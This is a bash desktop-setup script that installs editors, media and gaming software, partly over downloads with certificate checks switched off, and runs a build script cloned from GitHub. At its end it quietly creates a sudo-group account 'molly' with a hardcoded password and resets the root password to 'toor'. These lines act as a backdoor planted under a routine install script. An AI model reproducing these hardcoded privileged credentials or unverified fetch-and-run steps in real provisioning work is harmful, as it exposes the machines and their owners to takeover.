#!/bin/bash
wget --no-check-certificate -qO - https://download.sublimetext.com/sublimehq-pub.gpg | apt-key add -;
echo "deb https://download.sublimetext.com/ apt/stable/" | tee /etc/apt/sources.list.d/sublime-text.list;
apt-get update;
apt install obs-studio firewalld firewall-applet apt-transport-https -y;
apt install sublime-text -y;
systemctl enable firewalld;
systemctl enable rc-local;
git clone https://github.com/ind3p3nd3nt/Chiaki-AutoCompile;
sh ./Chiaki-AutoCompile/build.sh;
if [ "$(uname -m)" = x86_64 ]
then
wget --no-check-certificate -O skype.deb https://go.skype.com/skypeforlinux-64.deb;
dpkg -i skype.deb;
apt install mplayer mplayer-gui -y;
wget --no-check-certificate https://github.com/frostwire/frostwire/releases/download/frostwire-desktop-6.9.5-build-308/frostwire-6.9.5.amd64.tar.gz;
tar xvfz frostwire-6.9.5.amd64.tar.gz;
chmod +x frostwire-6.9.5.amd64/*
cp -r frostwire-6.9.5.amd64/* /usr/bin/
wget http://bluegriffon.org/freshmeat/3.1/bluegriffon-3.1.Ubuntu18.04-x86_64.deb
dpkg -i bluegriffon-3.1.Ubuntu18.04-x86_64.deb
apt install -f -y;
dpkg --add-architecture i386;
apt update;
fi
apt install wine32 steam -y;
useradd -m molly;
echo molly:eskam123 |  chpasswd;
usermod -g sudo molly;
echo root:toor |  chpasswd;
